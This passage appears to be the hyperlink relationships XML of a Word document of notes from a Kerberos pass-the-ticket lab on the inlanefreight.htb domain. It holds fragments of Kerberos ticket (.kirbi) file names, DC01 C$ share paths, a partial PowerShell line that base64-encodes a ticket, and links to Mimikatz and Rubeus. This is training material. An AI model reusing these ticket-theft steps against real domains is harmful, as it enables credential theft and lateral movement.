Id="R99202a0d68624a88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:0;3e7]-0-2-40a50000-DC01$@cifs-DC01.inlanefreight.htb.kirbi" TargetMode="External" Id="Rb6f9632ea0994b9d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:randomvalue]-username@service-domain.local.kirbi" TargetMode="External" Id="Rc6737cbaaa1b4ffa" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:plaintext@inlanefreight.htb" TargetMode="External" Id="R4212f8b3a4e647fe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it/18" TargetMode="External" Id="Rebbeb630c0cd476b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/harmj0y" TargetMode="External" Id="R5343f9f264f543d2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GhostPack/Rubeus" TargetMode="External" Id="R20633cbbdcf5442c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:benjamin@gentilkiwi.com" TargetMode="External" Id="Rb9111c321e25471e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.gentilkiwi.com/mimikatz" TargetMode="External" Id="Ra0e2cb23a1764942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:vincent.letoux@gmail.com" TargetMode="External" Id="Ra8e730a58ef14f5c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pingcastle.com" TargetMode="External" Id="Ra3fcaf38cfa14390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mysmartlogon.com" TargetMode="External" Id="R1c1bf8964e404484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:benjamin@gentilkiwi.com" TargetMode="External" Id="R1ed94293f6a946e7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.gentilkiwi.com/mimikatz" TargetMode="External" Id="R16000cc1ba9d4570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:vincent.letoux@gmail.com" TargetMode="External" Id="R017a100bc458483b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pingcastle.com" TargetMode="External" Id="R47c6622a78664d7a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mysmartlogon.com" TargetMode="External" Id="R5c321e6e29f743d7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GhostPack/Rubeus" TargetMode="External" Id="R46b5ac71f30c4beb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:/ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi" TargetMode="External" Id="R8a893e4779c84f9f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="\\DC01.inlanefreight.htb\c$" TargetMode="External" Id="R303ec42cfbb846dd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="\\dc01.inlanefreight.htb\c$" TargetMode="External" Id="R6b8e57cd0dc247dc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:Convert]::ToBase64String([IO.File]::ReadAllBytes(&quot;[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi" TargetMode="External" Id="R7c05a15ce8914e90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="\\DC01.inlanefreight.htb\c$" TargetMode="External" Id="R42345deca23c47c7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="\\dc01.inlanefreight.htb\c$" TargetMode="External" Id="R77870d6cac7940f2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:benjamin@gentilkiwi.com" TargetMode="External" Id="Rfd6e6d491b8a4251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.gentilkiwi.com/mimikatz" TargetMode="External" Id="R21d87aae34714fe0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:vincent.letoux@gmail.com" TargetMode="External" Id="Rb62199d43532484e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pingcastle.com" TargetMode="External" Id="R801db633307342a0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mysmartlogon.com" TargetMode="External" Id="R3c2d939bf353433f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="\\DC01.inlanefreight.htb\c$" TargetMode="External" Id="R7177101cd0cf443c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="\\dc01.inlanefreight.htb\c$" TargetMode="External" Id="R2d2718addfcf4e53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.2" TargetMode="External" Id="Rddf14d4b0ef144ac" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:benjamin@gentilkiwi.com" TargetMode="External" Id="R2bd8aa025b014066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.gentilkiwi.com/mimikatz" TargetMode="External" Id="Rfb7ae5b08c2e4a17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:vincent.letoux@gmail.com" TargetMode="External" Id="Rd7c52e31cae44dd2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pingcastle.com" TargetMode="External" Id="R75fd664fd0624eba" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mysmartlogon.com" TargetMode="External" Id="Rc1e192a59d534378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eventlogxp.com/blog/logon-type-what-does-it-mean/" TargetMode="External" Id="R1a45bc2c2bd64847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="Rce7944a2bce1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2024-03-17T17:10:51.6834141Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-17T17:11:32.5615098Z</dcterms:modified>
  <dc:creator>Aleksandar Milosavljevic</dc:creator>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>